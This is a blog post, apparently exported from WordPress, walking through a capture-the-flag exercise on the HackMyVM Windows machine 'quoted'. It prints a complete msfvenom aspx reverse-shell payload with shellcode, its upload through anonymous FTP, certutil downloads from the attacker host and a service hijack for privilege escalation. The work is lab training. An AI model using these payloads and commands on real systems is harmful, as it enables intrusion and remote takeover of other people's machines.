{"id":841,"date":"2025-06-08T22:35:55","date_gmt":"2025-06-08T14:35:55","guid":{"rendered":"http:\/\/162.14.82.114\/?p=841"},"modified":"2025-06-08T22:35:55","modified_gmt":"2025-06-08T14:35:55","slug":"hmv-_-quoted","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/841\/06\/08\/2025\/","title":{"rendered":"hmv[-_-]quoted"},"content":{"rendered":"<h1>quoted<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506082235153.png\" alt=\"image-20250608201539520\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506082235155.png\" alt=\"image-20250608203928661\" \/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nTo scan or not to scan? That is the question.\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.10.105:21\nOpen 192.168.10.105:445\nOpen 192.168.10.105:80\nOpen 192.168.10.105:135\nOpen 192.168.10.105:139\nOpen 192.168.10.105:5357\nOpen 192.168.10.105:49152\nOpen 192.168.10.105:49153\nOpen 192.168.10.105:49155\nOpen 192.168.10.105:49156\nOpen 192.168.10.105:49157\nOpen 192.168.10.105:49154\n\nPORT      STATE SERVICE      REASON          VERSION\n21\/tcp    open  ftp          syn-ack ttl 128 Microsoft ftpd\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| 10-05-24  12:16PM       &lt;DIR&gt;          aspnet_client\n| 10-05-24  12:27AM                  689 iisstart.htm\n|_10-05-24  12:27AM               184946 welcome.png\n| ftp-syst: \n|_  SYST: Windows_NT\n80\/tcp    open  http         syn-ack ttl 128 Microsoft IIS httpd 7.5\n|_http-server-header: Microsoft-IIS\/7.5\n| http-methods: \n|   Supported Methods: OPTIONS TRACE GET HEAD POST\n|_  Potentially risky methods: TRACE\n|_http-title: IIS7\n135\/tcp   open  msrpc        syn-ack ttl 128 Microsoft Windows RPC\n139\/tcp   open  netbios-ssn  syn-ack ttl 128 Microsoft Windows netbios-ssn\n445\/tcp   open  microsoft-ds syn-ack ttl 128 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)\n5357\/tcp  open  http         syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Service Unavailable\n49152\/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC\n49153\/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC\n49154\/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC\n49155\/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC\n49156\/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC\n49157\/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC\nMAC Address: 08:00:27:0B:1E:2F (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: QUOTED-PC; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| nbstat: NetBIOS name: 
QUOTED-PC, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:0b:1e:2f (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n| Names:\n|   QUOTED-PC&lt;00&gt;        Flags: &lt;unique&gt;&lt;active&gt;\n|   WORKGROUP&lt;00&gt;        Flags: &lt;group&gt;&lt;active&gt;\n|   QUOTED-PC&lt;20&gt;        Flags: &lt;unique&gt;&lt;active&gt;\n|   WORKGROUP&lt;1e&gt;        Flags: &lt;group&gt;&lt;active&gt;\n|   WORKGROUP&lt;1d&gt;        Flags: &lt;unique&gt;&lt;active&gt;\n|   \\x01\\x02__MSBROWSE__\\x02&lt;01&gt;  Flags: &lt;group&gt;&lt;active&gt;\n| Statistics:\n|   08:00:27:0b:1e:2f:00:00:00:00:00:00:00:00:00:00:00\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| smb-os-discovery: \n|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)\n|   OS CPE: cpe:\/o:microsoft:windows_7::sp1:professional\n|   Computer name: quoted-PC\n|   NetBIOS computer name: QUOTED-PC\\x00\n|   Workgroup: WORKGROUP\\x00\n|_  System time: 2025-06-08T15:41:51+03:00\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 58509\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 2 (port 48287\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 3 (port 7707\/udp): CLEAN (Timeout)\n|   Check 4 (port 10964\/udp): CLEAN (Failed to receive data)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n| smb2-time: \n|   date: 2025-06-08T12:41:51\n|_  start_date: 2025-06-08T12:36:01\n|_clock-skew: mean: -59m54s, deviation: 1h43m55s, median: 5s\n| smb2-security-mode: \n|   2:1:0: \n|_    Message signing enabled but not required<\/code><\/pre>\n<h3>Directory Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ dirsearch -u http:\/\/$IP\/ 2&gt;\/dev\/null\n\n  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460\n\nOutput File: \/home\/kali\/temp\/quoted\/reports\/http_192.168.10.105\/__25-06-08_08-46-41.txt\n\nTarget: http:\/\/192.168.10.105\/\n\n[08:46:41] Starting: \n[08:46:42] 403 -  312B  - \/%2e%2e\/\/google.com\n[08:46:42] 403 -  312B  - \/.%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/passwd\n[08:46:42] 404 -    1KB - \/.asmx\n[08:46:42] 404 -    1KB - \/.ashx\n[08:46:52] 403 -  312B  - \/\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd\n[08:47:10] 301 -  162B  - \/aspnet_client  -&gt;  http:\/\/192.168.10.105\/aspnet_client\/\n[08:47:10] 403 -    1KB - \/aspnet_client\/\n[08:47:14] 403 -  312B  - \/cgi-bin\/.%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/passwd\n[08:47:52] 404 -    1KB - \/service.asmx\n[08:48:01] 403 -    2KB - \/Trace.axd\n[08:48:02] 404 -    2KB - \/umbraco\/webservices\/codeEditorSave.asmx\n[08:48:07] 404 -    1KB - \/WebResource.axd?d=LER8t9aS\n\nTask Completed<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Footprinting<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506082235156.png\" alt=\"image-20250608210017295\" \/><\/p>\n<p>Looked at the page source but found nothing of interest there, so let's try another direction.<\/p>\n<h3>Probing the FTP Service<\/h3>\n<p>The port scan above showed that anonymous login is allowed; let's see what is in there:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ ftp $IP\nConnected to 192.168.10.105.\n220 Microsoft FTP Service\nName (192.168.10.105:kali): anonymous\n331 Anonymous access allowed, send identity (e-mail name) as password.\nPassword: \n230 User logged in.\nRemote system type is Windows_NT.\nftp&gt; mget *\nmget iisstart.htm [anpqy?]? \n229 Entering Extended Passive Mode (|||49162|)\n125 Data connection already open; Transfer starting.\n100% |************************************************************************************************************************************************|   689        0.98 MiB\/s    00:00 ETA\n226 Transfer complete.\n689 bytes received in 00:00 (507.42 KiB\/s)\nmget welcome.png [anpqy?]? \n229 Entering Extended Passive Mode (|||49163|)\n150 Opening ASCII mode data connection.\n100% |************************************************************************************************************************************************|   180 KiB    3.80 MiB\/s    00:00 ETA\n226 Transfer complete.\nWARNING! 
820 bare linefeeds received in ASCII mode.\nFile may not have transferred correctly.\n184946 bytes received in 00:00 (3.75 MiB\/s)<\/code><\/pre>\n<p>It turns out the FTP directory is exactly the web root:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ cat iisstart.htm\n&lt;!DOCTYPE html PUBLIC &quot;-\/\/W3C\/\/DTD XHTML 1.0 Strict\/\/EN&quot; &quot;http:\/\/www.w3.org\/TR\/xhtml1\/DTD\/xhtml1-strict.dtd&quot;&gt;\n&lt;html xmlns=&quot;http:\/\/www.w3.org\/1999\/xhtml&quot;&gt;\n&lt;head&gt;\n&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text\/html; charset=iso-8859-1&quot; \/&gt;\n&lt;title&gt;IIS7&lt;\/title&gt;\n&lt;style type=&quot;text\/css&quot;&gt;\n&lt;!--\nbody {\n        color:#000000;\n        background-color:#B3B3B3;\n        margin:0;\n}\n\n#container {\n        margin-left:auto;\n        margin-right:auto;\n        text-align:center;\n        }\n\na img {\n        border:none;\n}\n\n--&gt;\n&lt;\/style&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n&lt;div id=&quot;container&quot;&gt;\n&lt;a href=&quot;http:\/\/go.microsoft.com\/fwlink\/?linkid=66138&amp;clcid=0x409&quot;&gt;&lt;img src=&quot;welcome.png&quot; alt=&quot;IIS7&quot; width=&quot;571&quot; height=&quot;411&quot; \/&gt;&lt;\/a&gt;\n&lt;\/div&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ curl -s http:\/\/$IP\/\n&lt;!DOCTYPE html PUBLIC &quot;-\/\/W3C\/\/DTD XHTML 1.0 Strict\/\/EN&quot; &quot;http:\/\/www.w3.org\/TR\/xhtml1\/DTD\/xhtml1-strict.dtd&quot;&gt;\n&lt;html xmlns=&quot;http:\/\/www.w3.org\/1999\/xhtml&quot;&gt;\n&lt;head&gt;\n&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text\/html; charset=iso-8859-1&quot; \/&gt;\n&lt;title&gt;IIS7&lt;\/title&gt;\n&lt;style type=&quot;text\/css&quot;&gt;\n&lt;!--\nbody {\n        color:#000000;\n        background-color:#B3B3B3;\n        margin:0;\n}\n\n#container {\n        margin-left:auto;\n        margin-right:auto;\n        text-align:center;\n        }\n\na img {\n        border:none;\n}\n\n--&gt;\n&lt;\/style&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n&lt;div id=&quot;container&quot;&gt;\n&lt;a href=&quot;http:\/\/go.microsoft.com\/fwlink\/?linkid=66138&amp;clcid=0x409&quot;&gt;&lt;img src=&quot;welcome.png&quot; alt=&quot;IIS7&quot; width=&quot;571&quot; height=&quot;411&quot; \/&gt;&lt;\/a&gt;\n&lt;\/div&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p>Let's check whether a shell can be uploaded. Since the server is <code>IIS<\/code>, the shell to try is an <code>aspx<\/code> one.<\/p>\n<h3>Uploading an aspx Reverse Shell<\/h3>\n<p>First we need an <code>.aspx<\/code> webshell; you can find a ready-made one or generate one directly with msf:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ msfvenom -p windows\/x64\/shell_reverse_tcp lhost=192.168.10.106 lport=1234 -f aspx\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 460 bytes\nFinal size of aspx file: 3407 bytes\n&lt;%@ Page Language=&quot;C#&quot; AutoEventWireup=&quot;true&quot; %&gt;\n&lt;%@ Import Namespace=&quot;System.IO&quot; %&gt;\n&lt;script runat=&quot;server&quot;&gt;\n    private static Int32 MEM_COMMIT=0x1000;\n    private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;\n\n    [System.Runtime.InteropServices.DllImport(&quot;kernel32&quot;)]\n    private 
static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);\n\n    [System.Runtime.InteropServices.DllImport(&quot;kernel32&quot;)]\n    private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);\n\n    protected void Page_Load(object sender, EventArgs e)\n    {\n        byte[] my9L = new byte[460] {0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,\n0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,\n0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,\n0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,\n0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,\n0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,\n0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,\n0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,\n0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,\n0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,\n0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,\n0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x04,0xd2,\n0xc0,0xa8,0x0a,0x6a,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,\n0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x4d,\n0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,\n0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,\n0x99,0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x49,0xb8,0x63,0x6d,0x64,0x00,0x00,\n0x00,0x00,0x00,0x41,0x50,0x41,0x50,0x48,0x89,0xe2,0x57,0x57,0x57,0x4d,0x31,0xc0,0x6a,0x0d,0x59,0x41,\n0x50,0xe2,0xfc,0x66,0xc7,0x44,0x24,0x54,0x01,0x01,0x48,0x8d,0x44,0x24,0x18,0xc6,0x00,0x68,0x48,0x89,\n0xe6,0x56,0x50,0x41,0x50,0x41,0x50,0x41,0x50,0x49,0xff,0xc0,0x41,0x50,0x49,0xff,0xc8,0x4d,0x89,0xc1,\n0x4c,0x89,0xc1,0x41,0xba,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x48,0x31,0xd2,0x48,0xff,0xca,0x8b,0x0e,0x41,\n0xba,0x08,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,\n0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,\n0x59,0x41,0x89,0xda,0xff,0xd5};\n\n        IntPtr vIGwqi5 = VirtualAlloc(IntPtr.Zero,(UIntPtr)my9L.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n        System.Runtime.InteropServices.Marshal.Copy(my9L,0,vIGwqi5,my9L.Length);\n        IntPtr kHduZ8ZlHs = IntPtr.Zero;\n        IntPtr nDx9WQ2UEd = CreateThread(IntPtr.Zero,UIntPtr.Zero,vIGwqi5,IntPtr.Zero,0,ref kHduZ8ZlHs);\n    }\n&lt;\/script&gt;\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ msfvenom -p windows\/x64\/shell_reverse_tcp lhost=192.168.10.106 lport=1234 -f aspx &gt; shell.aspx\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 460 bytes\nFinal size of aspx file: 3409 bytes<\/code><\/pre>\n<p>Try uploading it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ ftp $IP\nConnected to 192.168.10.105.\n220 Microsoft FTP Service\nName (192.168.10.105:kali): anonymous\n331 Anonymous access allowed, send identity (e-mail name) as password.\nPassword: \n230 User logged in.\nRemote system type is 
Windows_NT.\nftp&gt; put shell.aspx \nlocal: shell.aspx remote: shell.aspx\n229 Entering Extended Passive Mode (|||49166|)\n150 Opening ASCII mode data connection.\n100% |************************************************************************************************************************************************|  3454       36.19 MiB\/s    --:-- ETA\n226 Transfer complete.\n3454 bytes sent in 00:00 (1.33 MiB\/s)\nftp&gt; exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ curl -s http:\/\/$IP\/shell.aspx<\/code><\/pre>\n<p>The shell came back! The root cause is that the anonymous FTP account can write into the IIS web root, so anything uploaded there is served, and an <code>.aspx<\/code> file is executed by the application pool as soon as it is requested.<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506082235157.png\" alt=\"image-20250608213349971\" \/><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<p>Another Windows target; I have done quite a few of these recently. Let's upload <code>WinPEAS<\/code> for information gathering.<\/p>\n<pre><code class=\"language-bash\">c:\\Users\\quoted\\Desktop&gt;dir\ndir\n C sürücüsündeki birimin etiketi yok.\n Birim Seri Numarası: D4DC-8644\n\n c:\\Users\\quoted\\Desktop dizini\n\n06.10.2024  17:25    &lt;DIR&gt;          .\n06.10.2024  17:25    &lt;DIR&gt;          ..\n06.10.2024  17:25                23 user.txt\n               1 Dosya               23 bayt\n               2 Dizin   22.207.266.816 bayt boş\n\nc:\\Users\\quoted\\Desktop&gt;type user.txt\ntype user.txt\nHMV{User_Flag_Obtained}\nc:\\Users\\quoted\\Desktop&gt;certutil -urlcache -split -f http:\/\/192.168.10.106:8888\/winPEAS.bat\ncertutil -urlcache -split -f http:\/\/192.168.10.106:8888\/winPEAS.bat\n****  Çevrimiçi  ****\n  0000  ...\n  9056\nCertUtil: -URLCache komutu başarıyla tamamlandı.\n\nc:\\Users\\quoted\\Desktop&gt;whoami \/all\nwhoami \/all\n\nKULLANICI BİLGİLERİ\n-------------------\n\nKullanıcı adı                SID     \n============================ ========\nnt authority\\network service S-1-5-20\n\nGRUP BİLGİLERİ\n--------------\n\nGrup Adı                             Tür              SID                                                           Öznitelikler                                                \n==================================== ================ ============================================================= ============================================================\nZorunlu Etiket\\Sistem Zorunlu Düzeyi Etiket           S-1-16-16384                                                                                                              \nEveryone                             İyi bilinen grup S-1-1-0                                                       Zorunlu grup, Varsayılan olarak etkin, Etkinleştirilmiş grup\nBUILTIN\\Users                        Diğer Ad         S-1-5-32-545                                                  Zorunlu grup, Varsayılan olarak etkin, Etkinleştirilmiş grup\nNT AUTHORITY\\SERVICE                 İyi bilinen grup S-1-5-6                                                       Zorunlu grup, Varsayılan olarak etkin, Etkinleştirilmiş grup\nKONSOL OTURUMU AÇMA                  İyi bilinen grup S-1-2-1                                                       Zorunlu grup, Varsayılan olarak etkin, Etkinleştirilmiş grup\nNT AUTHORITY\\Authenticated Users     İyi bilinen grup S-1-5-11                                                      Zorunlu grup, Varsayılan olarak etkin, Etkinleştirilmiş grup\nNT AUTHORITY\\This Organization       İyi bilinen grup S-1-5-15                                                      Zorunlu grup, Varsayılan olarak etkin, Etkinleştirilmiş grup\nBUILTIN\\IIS_IUSRS                    Diğer Ad         S-1-5-32-568                                                  Zorunlu grup, Varsayılan olarak etkin, Etkinleştirilmiş grup\nLOCAL                                İyi bilinen grup S-1-2-0                                                       Zorunlu grup, Varsayılan olarak etkin, Etkinleştirilmiş grup\nIIS APPPOOL\\DefaultAppPool           İyi bilinen grup S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 Zorunlu grup, Varsayılan olarak etkin, Etkinleştirilmiş grup\n\nAYRICALIK BİLGİLERİ\n----------------------\n\nAyrıcalık Adı                 Açıklama                                                 Durum     \n============================= ======================================================== ==========\nSeAssignPrimaryTokenPrivilege İşlem düzeyi belirtecini değiştir                        Devre Dışı\nSeIncreaseQuotaPrivilege      İşlem için bellek kotaları ayarla                        Devre Dışı\nSeSecurityPrivilege           Denetimi ve güvenlik günlüğünü yönet                     Devre Dışı\nSeShutdownPrivilege           Sistemi kapat                                            Devre Dışı\nSeAuditPrivilege              Güvenlik denetimleri oluştur                             Devre Dışı\nSeChangeNotifyPrivilege       Çapraz geçiş denetimini atla                             Etkin     \nSeUndockPrivilege             Bilgisayarı takma biriminden çıkar                       Devre Dışı\nSeImpersonatePrivilege        Kimlik doğrulamasından sonra istemcinin özelliklerini al Etkin     \nSeCreateGlobalPrivilege       Genel nesneler oluştur                                   Etkin     \nSeIncreaseWorkingSetPrivilege İşlem çalışma kümesini artır                             Devre Dışı\nSeTimeZonePrivilege           Saat dilimini değiştir <\/code><\/pre>\n<blockquote>\n<p>The build from the official site conflicts here; the one I downloaded is <a href=\"https:\/\/github.com\/Fa1c0n35\/winPEAS\">https:\/\/github.com\/Fa1c0n35\/winPEAS<\/a>, which is quite usable and does not throw errors. It then found:<\/p>\n<\/blockquote>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506082235158.png\" alt=\"image-20250608222004381\" \/><\/p>\n<p>It reports a possible <code>DLL hijack<\/code>; let's build the relevant file and swap it in to hijack the load.<\/p>\n<h3>Privilege Escalation via DLL Hijacking<\/h3>\n<p>First, make a payload:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ msfvenom -p windows\/x64\/shell_reverse_tcp lhost=192.168.10.106 lport=2345 -f exe &gt; dotNet.exe\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 460 bytes\nFinal size of exe file: 7168 bytes<\/code><\/pre>\n<p>After uploading it, try to start the service:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506082235159.png\" alt=\"image-20250608222825478\" \/><\/p>\n<p>The service appeared to start, but no shell came back:<\/p>\n<pre><code class=\"language-bash\">c:\\Users\\quoted\\Desktop&gt;certutil -urlcache -split -f http:\/\/192.168.10.106:8888\/dotNet.exe\ncertutil -urlcache -split -f http:\/\/192.168.10.106:8888\/dotNet.exe\n****  Çevrimiçi  ****\n  0000  ...\n  1c00\nCertUtil: -URLCache komutu başarıyla tamamlandı.\n\nc:\\Users\\quoted\\Desktop&gt;service PEService start\nservice PEService start\n&#039;service&#039; iç ya da dış komut, çalıştırılabilir\nprogram ya da toplu iş dosyası olarak tanınmıyor.\n\nc:\\Users\\quoted\\Desktop&gt;sc start PEService\nsc start PEService\n[SC] StartService BAŞARISIZ OLDU, hata: 193.<\/code><\/pre>\n<p>Only then did I realise the file had been downloaded to the wrong location....<\/p>\n<pre><code class=\"language-bash\">c:\\Users\\quoted\\Desktop&gt;cd ..\/..\/..\/\ncd ..\/..\/..\/\n\nc:\\&gt;certutil -urlcache -split -f http:\/\/192.168.10.106:8888\/dotNet.exe\ncertutil -urlcache -split -f http:\/\/192.168.10.106:8888\/dotNet.exe\n****  Çevrimiçi  ****\n  0000  ...\n  1c00\nCertUtil: -URLCache komutu başarıyla tamamlandı.\n\nc:\\&gt;sc start PEService\nsc start PEService\n[SC] StartService BAŞARISIZ - 1053:\n\nHizmet, belirli aralıklarla yapılan başlama veya denetim isteğine yanıt vermedi.<\/code><\/pre>\n<p>This time it executed, and the shell came back on the other side! Error 1053 is expected here: the payload is not a real service executable and never reports its status to the Service Control Manager, so the SCM times out after launching it, by which point the payload has already run.<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506082235160.png\" alt=\"image-20250608223401991\" \/><\/p>\n<p>Grab the flag:<\/p>\n<pre><code class=\"language-bash\">C:\\&gt;cd Users\/Administrator\ncd Users\/Administrator\n\nC:\\Users\\Administrator&gt;dir\ndir\n C sürücüsündeki birimin etiketi yok.\n Birim Seri Numarası: D4DC-8644\n\n C:\\Users\\Administrator dizini\n\n05.10.2024  00:09    &lt;DIR&gt;          .\n05.10.2024  00:09    &lt;DIR&gt;          ..\n05.10.2024  00:09    &lt;DIR&gt;          Contacts\n05.10.2024  18:23    &lt;DIR&gt;          Desktop\n05.10.2024  14:11    &lt;DIR&gt;          Documents\n05.10.2024  00:09    &lt;DIR&gt;          Downloads\n05.10.2024  00:09    &lt;DIR&gt;          Favorites\n05.10.2024  00:09    &lt;DIR&gt;          Links\n05.10.2024  00:09    &lt;DIR&gt;          Music\n05.10.2024  00:09    &lt;DIR&gt;          Pictures\n05.10.2024  00:09    &lt;DIR&gt;          Saved Games\n05.10.2024  00:09    &lt;DIR&gt;          Searches\n05.10.2024  00:09    &lt;DIR&gt;          Videos\n               0 Dosya                0 bayt\n              13 Dizin   22.146.179.072 bayt boş\n\nC:\\Users\\Administrator&gt;cd desktop\ncd desktop\n\nC:\\Users\\Administrator\\Desktop&gt;type root.txt\ntype root.txt\nHMV{Elevated_Shell_Again}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>quoted Information Gathering Port Scanning \u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted] \u2514\u2500$ rus 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-841","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/841","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=841"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/841\/revisions"}],"predecessor-version":[{"id":842,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/841\/revisions\/842"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=841"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=841"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=841"}],"curies":[{"name":"wp","href":"https:\/\/api.w